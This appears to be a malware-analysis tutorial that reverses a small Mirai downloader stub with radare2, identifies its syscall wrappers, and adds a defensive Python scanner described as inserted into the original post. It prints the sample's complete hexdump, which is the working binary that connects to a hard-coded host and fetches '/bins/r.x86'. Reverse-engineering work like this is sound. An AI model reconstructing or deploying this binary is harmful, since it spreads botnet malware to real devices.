1180

2021-02-03

File

File name upon detection: dlr.x86

File type: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

File hash: 423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8

File size: 1180 bytes

~ nm 1180
nm: 1180: no symbols

Intezer: #Mirai, https://analyze.intezer.com/#/files/423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8

Virustotal: https://www.virustotal.com/gui/file/423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8/relations

~ hexdump -C 423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8 | less
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 03 00 01 00 00 00  24 83 04 08 34 00 00 00  |........$...4...|
00000020  d4 03 00 00 00 00 00 00  34 00 20 00 03 00 28 00  |........4. ...(.|
00000030  05 00 04 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|
00000040  00 80 04 08 b4 03 00 00  b4 03 00 00 05 00 00 00  |................|
00000050  00 10 00 00 01 00 00 00  b4 03 00 00 b4 93 04 08  |................|
00000060  b4 93 04 08 00 00 00 00  04 00 00 00 06 00 00 00  |................|
00000070  00 10 00 00 51 e5 74 64  00 00 00 00 00 00 00 00  |....Q.td........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 06 00 00 00  |................|
00000090  04 00 00 00 55 89 e5 0f  b6 55 08 0f b6 45 0c c1  |....U....U...E..|
000000a0  e2 18 c1 e0 10 09 c2 0f  b6 4d 10 0f b6 45 14 c1  |.........M...E..|
000000b0  e1 08 09 c2 09 d1 5d 89  ca 89 c8 c1 e0 18 81 e2  |......].........|
000000c0  00 ff 00 00 c1 e2 08 09  d0 89 ca c1 ea 18 81 e1  |................|
000000d0  00 00 ff 00 c1 e9 08 09  ca 09 d0 c3 55 89 e5 83  |............U...|
000000e0  ec 10 ff 75 08 6a 01 e8  44 02 00 00 83 c4 10 c9  |...u.j..D.......|
000000f0  c3 55 89 e5 83 ec 10 ff  75 08 6a 06 e8 2f 02 00  |.U......u.j../..|
00000100  00 c9 c3 55 89 e5 83 ec  08 ff 75 10 ff 75 0c ff  |...U......u..u..|
00000110  75 08 6a 05 e8 17 02 00  00 c9 c3 55 89 e5 83 ec  |u.j........U....|
00000120  1c 8b 45 08 89 45 f4 8b  45 0c 89 45 f8 8b 45 10  |..E..E..E..E..E.|
00000130  89 45 fc 8d 45 f4 50 6a  03 6a 66 e8 f0 01 00 00  |.E..E.Pj.jf.....|
00000140  c9 c3 55 89 e5 83 ec 08  ff 75 10 ff 75 0c ff 75  |..U......u..u..u|
00000150  08 6a 04 e8 d8 01 00 00  c9 c3 55 89 e5 83 ec 08  |.j........U.....|
00000160  ff 75 10 ff 75 0c ff 75  08 6a 03 e8 c0 01 00 00  |.u..u..u.j......|
00000170  c9 c3 55 89 e5 83 ec 1c  8b 45 08 89 45 f4 8b 45  |..U......E..E..E|
00000180  0c 89 45 f8 8b 45 10 89  45 fc 8d 45 f4 50 6a 01  |..E..E..E..E.Pj.|
00000190  6a 66 e8 99 01 00 00 c9  c3 55 b8 7d 83 04 08 89  |jf.......U.}....|
000001a0  e5 57 56 53 81 ec ac 00  00 00 eb 01 40 80 38 00  |.WVS........@.8.|
000001b0  75 fa 2d 7d 83 04 08 89  85 50 ff ff ff 50 6a 02  |u.-}.....P...Pj.|
000001c0  68 81 83 04 08 6a 01 e8  76 ff ff ff 68 d2 00 00  |h....j..v...h...|
000001d0  00 66 c7 45 e0 02 00 6a  6e 66 c7 45 e2 00 50 68  |.f.E...jnf.E..Ph|
000001e0  ac 00 00 00 68 b9 00 00  00 e8 a6 fe ff ff 83 c4  |....h...........|
000001f0  1c 89 45 e4 68 ff 01 00  00 68 41 02 00 00 68 85  |..E.h....hA...h.|
00000200  83 04 08 e8 fb fe ff ff  83 c4 0c 89 c7 6a 00 6a  |.............j.j|
00000210  01 6a 02 e8 5a ff ff ff  83 c4 10 89 c6 83 f8 ff  |.j..Z...........|
00000220  74 05 83 ff ff 75 0d 83  ec 0c 6a 01 e8 ab fe ff  |t....u....j.....|
00000230  ff 83 c4 10 50 8d 45 e0  6a 10 50 56 e8 da fe ff  |....P.E.j.PV....|
00000240  ff 83 c4 10 89 c3 85 c0  79 1c f7 db 50 6a 04 68  |........y...Pj.h|
00000250  8d 83 04 08 6a 01 e8 e7  fe ff ff 89 1c 24 e8 79  |....j........$.y|
00000260  fe ff ff 83 c4 10 8b 9d  50 ff ff ff 50 83 c3 20  |........P...P.. |
00000270  53 68 92 83 04 08 56 e8  c6 fe ff ff 83 c4 10 39  |Sh....V........9|
00000280  d8 74 0d 83 ec 0c 6a 03  e8 4f fe ff ff 83 c4 10  |.t....j..O......|
00000290  31 db 50 8d 45 f3 6a 01  50 56 e8 bb fe ff ff 83  |1.P.E.j.PV......|
000002a0  c4 10 48 74 0d 83 ec 0c  6a 04 e8 2d fe ff ff 83  |..Ht....j..-....|
000002b0  c4 10 0f be 45 f3 c1 e3  08 09 c3 81 fb 0a 0d 0a  |....E...........|
000002c0  0d 75 cf 8d 9d 60 ff ff  ff 51 68 80 00 00 00 53  |.u...`...Qh....S|
000002d0  56 e8 84 fe ff ff 83 c4  10 85 c0 7e 0e 52 50 53  |V..........~.RPS|
000002e0  57 e8 5c fe ff ff 83 c4  10 eb d8 83 ec 0c 56 e8  |W.\...........V.|
000002f0  fd fd ff ff 89 3c 24 e8  f5 fd ff ff 83 c4 0c 6a  |.....<$........j|
00000300  04 68 af 83 04 08 6a 01  e8 35 fe ff ff c7 04 24  |.h....j..5.....$|
00000310  05 00 00 00 e8 c3 fd ff  ff 83 c4 10 8d 65 f4 5b  |.............e.[|
00000320  5e 5f 5d c3 55 89 e5 5d  e9 6c fe ff ff 90 90 90  |^_].U..].l......|
00000330  55 57 56 53 8b 6c 24 2c  8b 7c 24 28 8b 74 24 24  |UWVS.l$,.|$(.t$$|
00000340  8b 54 24 20 8b 4c 24 1c  8b 5c 24 18 8b 44 24 14  |.T$ .L$..\$..D$.|
00000350  cd 80 5b 5e 5f 5d 3d 01  f0 ff ff 0f 83 01 00 00  |..[^_]=.........|
00000360  00 c3 83 ec 0c 89 c2 f7  da e8 09 00 00 00 89 10  |................|
00000370  83 c8 ff 83 c4 0c c3 b8  b4 93 04 08 c3 78 38 36  |.............x86|
00000380  00 54 46 0a 00 44 61 77  64 32 41 44 00 4e 49 46  |.TF..Dawd2AD.NIF|
00000390  0a 00 47 45 54 20 2f 62  69 6e 73 2f 72 2e 78 38  |..GET /bins/r.x8|
000003a0  36 20 48 54 54 50 2f 31  2e 30 0d 0a 0d 0a 00 49  |6 HTTP/1.0.....I|
000003b0  4e 54 0a 00 00 2e 73 68  73 74 72 74 61 62 00 2e  |NT....shstrtab..|
000003c0  74 65 78 74 00 2e 72 6f  64 61 74 61 00 2e 62 73  |text..rodata..bs|
000003d0  73 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |s...............|
000003e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000003f0  00 00 00 00 00 00 00 00  00 00 00 00 0b 00 00 00  |................|
00000400  01 00 00 00 06 00 00 00  94 80 04 08 94 00 00 00  |................|
00000410  e9 02 00 00 00 00 00 00  00 00 00 00 04 00 00 00  |................|
00000420  00 00 00 00 11 00 00 00  01 00 00 00 32 00 00 00  |............2...|
00000430  7d 83 04 08 7d 03 00 00  37 00 00 00 00 00 00 00  |}...}...7.......|
00000440  00 00 00 00 01 00 00 00  01 00 00 00 19 00 00 00  |................|
00000450  08 00 00 00 03 00 00 00  b4 93 04 08 b4 03 00 00  |................|
00000460  04 00 00 00 00 00 00 00  00 00 00 00 04 00 00 00  |................|
00000470  00 00 00 00 01 00 00 00  03 00 00 00 00 00 00 00  |................|
00000480  00 00 00 00 b4 03 00 00  1e 00 00 00 00 00 00 00  |................|
00000490  00 00 00 00 01 00 00 00  00 00 00 00              |............|
0000049c

Tools

Ghidra v 9.2.1

Cutter v 1.12.0 Using r2-4.5.0-20-g293cf5ae6

Radare2 v radare2 5.0.1-git 26326 @ linux-x86-64 git.5.0.0

Strings

Let's check the printable strings in the binary:

~ strings 1180
RPSW
[^_]
UWVS
[^_]=
Dawd2AD
GET /bins/r.x86 HTTP/1.0
.shstrtab
.text
.rodata
.bss

Two of them are interesting: Dawd2AD and GET /bins/r.x86 HTTP/1.0. The second one implies HTTP communication. Let's check which function uses that string: load the sample into radare2 and look at the cross references to it.

~ r2 1180 
 -- That's embarrassing.
[0x08048324]> aaaa
[0x08048324]> afl
0x08048324   18 404          entry0
0x08048330    3 71           fcn.08048330
0x08048377    1 6            fcn.08048377
0x08048142    1 24           fcn.08048142
0x08048094    1 72           fcn.08048094
0x08048103    1 24           fcn.08048103
0x08048172    1 39           fcn.08048172
0x080480dc    1 21           fcn.080480dc
0x0804811b    1 39           fcn.0804811b
0x0804815a    1 24           fcn.0804815a
0x080480f1    1 18           fcn.080480f1
[0x08048324]> afl~?
11

r2 detected 11 functions. Now the strings, with their addresses:

[0x08048324]> iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000385 0x08048385 7   8    .rodata ascii Dawd2AD
1   0x0000038d 0x0804838d 4   5    .rodata ascii NIF\n
2   0x00000392 0x08048392 28  29   .rodata ascii GET /bins/r.x86 HTTP/1.0\r\n\r\n
3   0x000003af 0x080483af 4   5    .rodata ascii INT\n

String 2 is the one we care about. Let's check its cross references (XREFS):

[0x08048324]> axt 0x08048392
entry0 0x8048271 [DATA] push str.GET__bins_r.x86_HTTP_1.0_r_n_r_n

From here we can see that this string is used at addr 0x8048271. Let's check it:

[0x08048324]> s 0x8048271
[0x08048271]> pd--4
│           ; CODE XREF from entry0 @ 0x8048248
│           0x08048266      8b9d50ffffff   mov ebx, dword [var_b0h]
│           0x0804826c      50             push eax
│           0x0804826d      83c320         add ebx, 0x20               ; 32
│           0x08048270      53             push ebx
│           0x08048271      6892830408     push str.GET__bins_r.x86_HTTP_1.0_r_n_r_n ; 0x8048392 ; "GET /bins/r.x86 HTTP/1.0\r\n\r\n" ; int32_t arg_ch
│           0x08048276      56             push esi                    ; int32_t arg_8h
│           0x08048277      e8c6feffff     call fcn.08048142
│           0x0804827c      83c410         add esp, 0x10
[0x08048271]> 


The pd--4 command prints the disassembly around the current address (4 instructions before and after it). The GET string is pushed as the second argument (after esi, the first) to fcn.08048142. Let's follow that call.

[0x08048271]> s fcn.08048142
[0x08048142]> pdf
            ; CALL XREFS from entry0 @ 0x80481c7, 0x8048256, 0x8048277, 0x80482e1, 0x8048308
╭ 24: fcn.08048142 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           ; arg int32_t arg_ch @ ebp+0xc
│           ; arg int32_t arg_10h @ ebp+0x10
│           0x08048142      55             push ebp
│           0x08048143      89e5           mov ebp, esp
│           0x08048145      83ec08         sub esp, 8
│           0x08048148      ff7510         push dword [arg_10h]
│           0x0804814b      ff750c         push dword [arg_ch]
│           0x0804814e      ff7508         push dword [arg_8h]
│           0x08048151      6a04           push 4                      ; 4
│           0x08048153      e8d8010000     call fcn.08048330
│           0x08048158      c9             leave
╰           0x08048159      c3             ret

So this is a function with 3 arguments, which it passes straight down to another function, fcn.08048330, together with the constant 4. Let's check how many calls in this sample go to the current function, fcn.08048142:

[0x08048142]> axt fcn.08048142
entry0 0x80481c7 [CALL] call fcn.08048142
entry0 0x8048256 [CALL] call fcn.08048142
entry0 0x8048277 [CALL] call fcn.08048142
entry0 0x80482e1 [CALL] call fcn.08048142
entry0 0x8048308 [CALL] call fcn.08048142

The axt command lists the data and code references to an address. So fcn.08048142 is called from 5 places, all of them in entry0. Nice.

Let's put this aside and go one level deeper into fcn.08048330. Keep in mind that the first argument pushed for it at 0x08048151 is 4. This function is called from 7 places, as axt 0x08048330~? shows.

What does it do?

Syscall

[0x08048330]> pdf
fcn.syscall_08048330 (int32_t syscall_code, int32_t arg_18h, int32_t arg_1ch, int32_t arg_20h, int32_t arg_24h, int32_t arg_28h, int32_t arg_2ch);
│           0x08048330      55             push ebp
│           0x08048331      57             push edi
│           0x08048332      56             push esi
│           0x08048333      53             push ebx
│           0x08048334      8b6c242c       mov ebp, dword [arg_2ch]
│           0x08048338      8b7c2428       mov edi, dword [arg_28h]
│           0x0804833c      8b742424       mov esi, dword [arg_24h]
│           0x08048340      8b542420       mov edx, dword [arg_20h]
│           0x08048344      8b4c241c       mov ecx, dword [arg_1ch]
│           0x08048348      8b5c2418       mov ebx, dword [arg_18h]
│           0x0804834c      8b442414       mov eax, dword [syscall_code]
│           0x08048350      cd80           int 0x80
...

At address 0x08048350 we see the bytes cd 80, the instruction int 0x80, which raises a software interrupt. The operand of int is the interrupt vector, and on 32-bit Linux vector 0x80 is the system call entry point, so this is how the program talks to the kernel. Before the interrupt the function loads eax from its first argument and ebx, ecx, edx, esi, edi, ebp from the following six, which is exactly the i386 system call convention: the syscall number in eax and up to six arguments in the other registers. After int 0x80 (hexdump offset 0x356) it compares eax with 0xfffff001; a return value at or above that is a negative errno, which the code negates and stores through the pointer returned by fcn.08048377 before returning -1.

So we can rename this function to fcn.syscall_08048330 with the afn command. In the previous function the first argument pushed was 4, and r2's asl command maps a syscall number to its name: asl 4 prints write. So fcn.08048142 is a wrapper for the write system call. Its prototype from man 2 write is ssize_t write(int fd, const void *buf, size_t count);, so we can rename the function and its arguments accordingly.

[0x08048330]> afn fcn.syscall_08048330
[0x08048142]> afn fcn.write_08048142

[0x08048142]> afvn fd arg_8h
[0x08048142]> afvn buf arg_ch
[0x08048142]> afvn count arg_10h

[0x08048142]> afvt fd int
[0x08048142]> afvt buf void*
[0x08048142]> afvt count size_t

Now our updated write function looks like this:

[0x08048142]> pdf
            ; CALL XREFS from entry0 @ 0x80481c7, 0x8048256, 0x8048277, 0x80482e1, 0x8048308
╭ 24: fcn.write_08048142 (int fd, void*buf, size_t count);
│           ; arg int fd @ ebp+0x8
│           ; arg void*buf @ ebp+0xc
│           ; arg size_t count @ ebp+0x10
│           0x08048142      55             push ebp
│           0x08048143      89e5           mov ebp, esp
│           0x08048145      83ec08         sub esp, 8
│           0x08048148      ff7510         push dword [count]
│           0x0804814b      ff750c         push dword [buf]
│           0x0804814e      ff7508         push dword [fd]
│           0x08048151      6a04           push 4                      ; 4
│           0x08048153      e8d8010000     call fcn.syscall_08048330
│           0x08048158      c9             leave
╰           0x08048159      c3             ret
[0x08048142]> 

Two functions identified. Let's keep using this approach on the remaining functions.

[0x08048199]> afl
0x08048324   18 404          entry0
0x08048330    3 71           fcn.syscall_08048330
0x08048377    1 6            fcn.08048377
0x08048142    1 24           fcn.write_08048142
0x08048094    1 72           fcn.08048094
0x08048103    1 24           fcn.08048103
0x08048172    1 39           fcn.08048172
0x080480dc    1 21           fcn.080480dc
0x0804811b    1 39           fcn.0804811b
0x0804815a    1 24           fcn.0804815a
0x080480f1    1 18           fcn.080480f1

From the write function we can see that the syscall number is pushed immediately before the call to the syscall function, so we can look for other places that follow the pattern push X; call. The r2 command /ad/ searches the disassembly for a pattern:

[0x08048142]> "/ad/ push ; call"
0x0804813b   # 7: push 0x66; call fcn.syscall_08048330
0x08048192   # 7: push 0x66; call fcn.syscall_08048330
0x08048213   # 7: push 2; call fcn.08048172
0x0804822c   # 7: push 1; call fcn.080480dc
0x08048277   # 6: push esi; call fcn.write_08048142
0x08048288   # 7: push 3; call fcn.080480dc
0x0804829a   # 6: push esi; call fcn.0804815a
0x080482aa   # 7: push 4; call fcn.080480dc
0x080482ef   # 6: push esi; call fcn.080480f1

The search command / leaves flags ("bookmarks") named hitN_M at every hit. f~hit lists the flags (f) and keeps only those containing "hit"; remove them with f- hit*.

[0x0804813b]> f~hit
0x0804813b 7 hit1_0
0x08048192 7 hit1_1
0x08048213 7 hit1_2
0x0804822c 7 hit1_3
0x08048277 6 hit1_4
0x08048288 7 hit1_5
0x0804829a 6 hit1_6
0x080482aa 7 hit1_7
0x080482ef 6 hit1_8

These are our potential syscall wrappers. Note that some hits are entry0 calling a wrapper with an immediate argument rather than a wrapper itself, and the search did not catch every wrapper either (the push 4; call at 0x08048151 inside fcn.write_08048142 is missing), so we will still go through afl by hand afterwards. Let's check the hits one by one:

[0x0804813b]> s hit1_0; pd--2
│           0x08048137      6a03           push 3                      ; 3
│           0x08048139      6a66           push 0x66                   ; 'f' ; 102
│           ;-- hit1_0:
│           0x0804813b      e8f0010000     call fcn.syscall_08048330
│           0x08048140      c9             leave
[0x0804813b]> 

Here the immediate 0x66 is pushed last, so it is the first argument to the syscall function. Let's check what it is:

[0x0804813b]> asl 0x66
socketcall

Great, we just found a socketcall wrapper; see man 2 socketcall for the details.

Now we can rename that function. afn. prints the name of the function we are currently in, and afn renames it.

[0x0804813b]> afn fcn.socketcall_0804811b 0x0804811b
[0x0804813b]> afn.
fcn.socketcall_0804811b

Let's go to the next function. Next hit: s hit1_1

[0x0804813b]> s hit1_1
[0x08048192]> pd--2
│           0x0804818e      6a01           push 1                      ; 1
│           0x08048190      6a66           push 0x66                   ; 'f' ; 102
│           ;-- hit1_1:
│           0x08048192      e899010000     call fcn.syscall_08048330
│           0x08048197      c9             leave
[0x08048192]> afn
fcn.08048172
[0x08048192]> pdf
            ; CALL XREF from entry0 @ 0x8048213
╭ 39: fcn.08048172 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│           ; var int32_t var_ch @ ebp-0xc
│           ; var int32_t var_8h @ ebp-0x8
│           ; var int32_t var_4h @ ebp-0x4
│           ; arg int32_t arg_8h @ ebp+0x8
│           ; arg int32_t arg_ch @ ebp+0xc
│           ; arg int32_t arg_10h @ ebp+0x10
│           0x08048172      55             push ebp
│           0x08048173      89e5           mov ebp, esp
│           0x08048175      83ec1c         sub esp, 0x1c
│           0x08048178      8b4508         mov eax, dword [arg_8h]
│           0x0804817b      8945f4         mov dword [var_ch], eax
│           0x0804817e      8b450c         mov eax, dword [arg_ch]
│           0x08048181      8945f8         mov dword [var_8h], eax
│           0x08048184      8b4510         mov eax, dword [arg_10h]
│           0x08048187      8945fc         mov dword [var_4h], eax
│           0x0804818a      8d45f4         lea eax, [var_ch]
│           0x0804818d      50             push eax
│           0x0804818e      6a01           push 1                      ; 1
│           0x08048190      6a66           push 0x66                   ; 'f' ; 102
│           ;-- hit1_1:
│           0x08048192      e899010000     call fcn.syscall_08048330
│           0x08048197      c9             leave
╰           0x08048198      c3             ret

This function also calls the syscall wrapper with 0x66, but the argument pushed just before it is 1 rather than the 3 we saw in fcn.socketcall_0804811b.

What's going on here?

Socketcall

We can find needed information in the manpage.

Declaration of the function:

int socketcall(int call, unsigned long *args);

In $ man 2 socketcall in the "Notes" section we can see

       On x86-32, socketcall() was historically the only entry point for the sockets API.  However, starting in Linux 4.3, direct system calls are provided on x86-32 for the sockets API.  This facilitates the creation of seccomp(2) filters that filter sockets system calls (for new user-space binaries that are compiled to use the new entry points) and also provides a (very) small performance improvement.

And the list of calls. We are interested only in numbers 1 and 3; they are numbered in natural order, starting from 1:

number  name         manpage
1       SYS_SOCKET   socket(2)
2       ..
3       SYS_CONNECT  connect(2)

From this table we can see that our two unknown functions are the socket and connect operations of socketcall. Let's rename them:

afn fcn.socketcall_scocket_08048172 0x08048172
afn fcn.socketcall_connect_0804811b 0x0804811b

Good. Two more functions identified.

Let's come back to our syscalls. Check what we have so far:

[0x08048172]> afl
0x08048324   18 404          entry0
0x08048330    3 71           fcn.syscall_08048330
0x08048377    1 6            fcn.08048377
0x08048142    1 24           fcn.write_08048142
0x08048094    1 72           fcn.08048094
0x08048103    1 24           fcn.08048103
0x08048172    1 39           fcn.socketcall_scocket_08048172
0x080480dc    1 21           fcn.080480dc
0x0804811b    1 39           fcn.socketcall_connect_0804811b
0x0804815a    1 24           fcn.0804815a
0x080480f1    1 18           fcn.080480f1

Check function fcn.08048377

[0x08048377]> pdf @ fcn.08048377
            ; CALL XREF from fcn.syscall_08048330 @ 0x8048369
╭ 6: fcn.08048377 ();
│ bp: 0 (vars 0, args 0)
│ sp: 0 (vars 0, args 0)
│ rg: 0 (vars 0, args 0)
│           0x08048377      b8b4930408     mov eax, segment.LOAD1      ; 0x80493b4
╰           0x0804837c      c3             ret
[0x08048377]> 

It returns a fixed address, 0x80493b4, which is the start of the 4-byte .bss section (see the section header at the end of the hexdump). The syscall function calls it on its error path, after int 0x80 returns a value above 0xfffff000, and stores the negated return value there, so this is the program's errno location. We can rename it to fcn.get_DATA. We can skip fcn.08048094 (72 bytes) for now, since it is the biggest one. Next is fcn.08048103, which is the same size as fcn.write_08048142.

[0x08048377]> pdf @ fcn.08048103
            ; CALL XREF from entry0 @ 0x8048203
╭ 24: fcn.08048103 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           ; arg int32_t arg_ch @ ebp+0xc
│           ; arg int32_t arg_10h @ ebp+0x10
│           0x08048103      55             push ebp
│           0x08048104      89e5           mov ebp, esp
│           0x08048106      83ec08         sub esp, 8
│           0x08048109      ff7510         push dword [arg_10h]
│           0x0804810c      ff750c         push dword [arg_ch]
│           0x0804810f      ff7508         push dword [arg_8h]
│           0x08048112      6a05           push 5                      ; 5
│           0x08048114      e817020000     call fcn.syscall_08048330
│           0x08048119      c9             leave
╰           0x0804811a      c3             ret

The syscall function is invoked here with syscall number 5. We already know how to look up its name (asl) and where the details are (the manpage):

asl 5
open

Rename this function to fcn.open_08048103 with afn.

[0x08048377]> afl
0x08048324   18 404          entry0
0x08048330    3 71           fcn.syscall_08048330
0x08048377    1 6            fcn.get_DATA
0x08048142    1 24           fcn.write_08048142
0x08048094    1 72           fcn.08048094
0x08048103    1 24           fcn.open_08048103
0x08048172    1 39           fcn.socketcall_scocket_08048172
0x080480dc    1 21           fcn.080480dc
0x0804811b    1 39           fcn.socketcall_connect_0804811b
0x0804815a    1 24           fcn.0804815a
0x080480f1    1 18           fcn.080480f1
[0x08048377]> pdf @ fcn.080480dc
            ; XREFS: CODE 0x08048076  CALL 0x0804822c  CALL 0x0804825e  CALL 0x08048288  CALL 0x080482aa  CALL 0x08048314  
╭ 21: fcn.080480dc (int32_t arg_8h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x080480dc      55             push ebp
│           0x080480dd      89e5           mov ebp, esp
│           0x080480df      83ec10         sub esp, 0x10
│           0x080480e2      ff7508         push dword [arg_8h]
│           0x080480e5      6a01           push 1                      ; 1
│           0x080480e7      e844020000     call fcn.syscall_08048330
│           0x080480ec      83c410         add esp, 0x10
│           0x080480ef      c9             leave
╰           0x080480f0      c3             ret
[0x08048377]> asl 1
exit

This one is exit. Rename it with afn as well.

Check another one:

[0x08048330]> s fcn.0804815a
[0x0804815a]> pdf
            ; CALL XREFS from entry0 @ 0x804829a, 0x80482d1
╭ 24: fcn.0804815a (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           ; arg int32_t arg_ch @ ebp+0xc
│           ; arg int32_t arg_10h @ ebp+0x10
│           0x0804815a      55             push ebp
│           0x0804815b      89e5           mov ebp, esp
│           0x0804815d      83ec08         sub esp, 8
│           0x08048160      ff7510         push dword [arg_10h]
│           0x08048163      ff750c         push dword [arg_ch]
│           0x08048166      ff7508         push dword [arg_8h]
│           0x08048169      6a03           push 3                      ; 3
│           0x0804816b      e8c0010000     call fcn.syscall_08048330
│           0x08048170      c9             leave
╰           0x08048171      c3             ret
[0x0804815a]> asl 3
read
[0x0804815a]> 

This one stands for read. Rename it as well: afn fcn.read_0804815a 0x0804815a

And one more from the list:

[0x0804815a]> pdf @ fcn.080480f1
            ; CALL XREFS from entry0 @ 0x80482ef, 0x80482f7
╭ 18: fcn.080480f1 (int32_t arg_8h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x080480f1      55             push ebp
│           0x080480f2      89e5           mov ebp, esp
│           0x080480f4      83ec10         sub esp, 0x10
│           0x080480f7      ff7508         push dword [arg_8h]
│           0x080480fa      6a06           push 6                      ; 6
│           0x080480fc      e82f020000     call fcn.syscall_08048330
│           0x08048101      c9             leave
╰           0x08048102      c3             ret
[0x0804815a]> asl 6
close
[0x0804815a]>

This one is close. Let's rename it: afn fcn.close_080480f1 0x080480f1

Now we have this:

[0x08048330]> afl
0x08048324   18 404          entry0
0x08048330    3 71           fcn.syscall_08048330
0x08048377    1 6            fcn.get_DATA
0x08048142    1 24           fcn.write_08048142
0x08048094    1 72           fcn.08048094
0x08048103    1 24           fcn.open_08048103
0x08048172    1 39           fcn.socketcall_scocket_08048172
0x080480dc    1 21           fcn.exit_080480dc
0x0804811b    1 39           fcn.socketcall_connect_0804811b
0x0804815a    1 24           fcn.read_0804815a
0x080480f1    1 18           fcn.close_080480f1
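The table above was built by hand, one wrapper at a time. As a cross-check, and to catch the wrappers the /ad/ search skipped, here is an added Python scanner that is not part of the original post. It works on the raw bytes of the wrapper region copied from the hexdump above (file offsets 0xd0-0x19f; the single LOAD segment maps file offset X at vaddr 0x08048000 + X), looks for push imm8; call pairs whose target is fcn.syscall_08048330, decodes the socketcall operation from the push immediately before it, and walks back to the nearest push ebp; mov ebp, esp prologue to find the wrapper's start address. The syscall and socketcall tables are the standard i386 ones; only the entries this sample uses are included.

```python
import struct

# i386 syscall numbers used by this sample (what `asl N` prints in r2).
I386_SYSCALLS = {1: "exit", 3: "read", 4: "write", 5: "open", 6: "close", 102: "socketcall"}
# socketcall() multiplexer operations, numbered as in man 2 socketcall.
SOCKETCALL_NAMES = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

# File offsets 0xd0-0x19f of the sample, copied from the page's hexdump.
WRAPPER_BYTES = bytes.fromhex(
    "0000ff00c1e90809ca09d0c35589e583"   # 0xd0
    "ec10ff75086a01e84402000083c410c9"   # 0xe0
    "c35589e583ec10ff75086a06e82f0200"   # 0xf0
    "00c9c35589e583ec08ff7510ff750cff"   # 0x100
    "75086a05e817020000c9c35589e583ec"   # 0x110
    "1c8b45088945f48b450c8945f88b4510"   # 0x120
    "8945fc8d45f4506a036a66e8f0010000"   # 0x130
    "c9c35589e583ec08ff7510ff750cff75"   # 0x140
    "086a04e8d8010000c9c35589e583ec08"   # 0x150
    "ff7510ff750cff75086a03e8c0010000"   # 0x160
    "c9c35589e583ec1c8b45088945f48b45"   # 0x170
    "0c8945f88b45108945fc8d45f4506a01"   # 0x180
    "6a66e899010000c9c355b87d83040889"   # 0x190
)
BASE_VADDR = 0x08048000 + 0xD0      # vaddr of WRAPPER_BYTES[0]
SYSCALL_STUB = 0x08048330           # fcn.syscall_08048330, the int 0x80 function
PROLOGUE = b"\x55\x89\xe5"          # push ebp ; mov ebp, esp


def find_syscall_wrappers(code, base_vaddr, stub_vaddr):
    """Return [(wrapper_start_vaddr, syscall_name), ...] for every
    'push imm8 ; call stub' pair found in `code`."""
    found = []
    i = 0
    while i + 7 <= len(code):
        # 6a ib = push imm8 ; e8 cd = call rel32 (relative to the end of the call)
        if code[i] == 0x6A and code[i + 2] == 0xE8:
            rel = struct.unpack_from("<i", code, i + 3)[0]
            target = base_vaddr + i + 2 + 5 + rel
            if target == stub_vaddr:
                nr = code[i + 1]
                name = I386_SYSCALLS.get(nr, "sys_%d" % nr)
                # socketcall: the real operation is the imm8 pushed just before 0x66
                if nr == 102 and i >= 2 and code[i - 2] == 0x6A:
                    op = code[i - 1]
                    name = "socketcall(%s)" % SOCKETCALL_NAMES.get(op, op)
                start = code.rfind(PROLOGUE, 0, i)   # nearest preceding prologue
                if start < 0:
                    start = i
                found.append((base_vaddr + start, name))
                i += 7
                continue
        i += 1
    return found


if __name__ == "__main__":
    for addr, name in find_syscall_wrappers(WRAPPER_BYTES, BASE_VADDR, SYSCALL_STUB):
        print("0x%08x  %s" % (addr, name))
```

The scan keys on the call target, not on the push, so an immediate that happens to equal a syscall number elsewhere in the code does not produce a false hit; the prologue walk-back is the only heuristic part and is fine for code this small. Feeding it the whole .text section (file offsets 0x94-0x37c) instead of this slice yields the same seven wrappers.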

The last one left for dissection is fcn.08048094. It is the biggest function, but let's start with the disassembly:

[0x08048330]> s fcn.08048094
> pdf
╭ 72: fcn.08048094 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h);
│           ; arg int32_t arg_8h @ ebp+0x8
│           ; arg int32_t arg_ch @ ebp+0xc
│           ; arg int32_t arg_10h @ ebp+0x10
│           ; arg int32_t arg_14h @ ebp+0x14
│           0x08048094      55             push ebp                    ; [01] -r-x section size 745 named .text
│           0x08048095      89e5           mov ebp, esp
│           0x08048097      0fb65508       movzx edx, byte [arg_8h]
│           0x0804809b      0fb6450c       movzx eax, byte [arg_ch]
│           0x0804809f      c1e218         shl edx, 0x18
│           0x080480a2      c1e010         shl eax, 0x10
│           0x080480a5      09c2           or edx, eax
│           0x080480a7      0fb64d10       movzx ecx, byte [arg_10h]
│           0x080480ab      0fb64514       movzx eax, byte [arg_14h]
│           0x080480af      c1e108         shl ecx, 8
│           0x080480b2      09c2           or edx, eax
│           0x080480b4      09d1           or ecx, edx
│           0x080480b6      5d             pop ebp
│           0x080480b7      89ca           mov edx, ecx
│           0x080480b9      89c8           mov eax, ecx
│           0x080480bb      c1e018         shl eax, 0x18
│           0x080480be      81e200ff0000   and edx, 0xff00
│           0x080480c4      c1e208         shl edx, 8
│           0x080480c7      09d0           or eax, edx
│           0x080480c9      89ca           mov edx, ecx
│           0x080480cb      c1ea18         shr edx, 0x18
│           0x080480ce      81e10000ff00   and ecx, 0xff0000
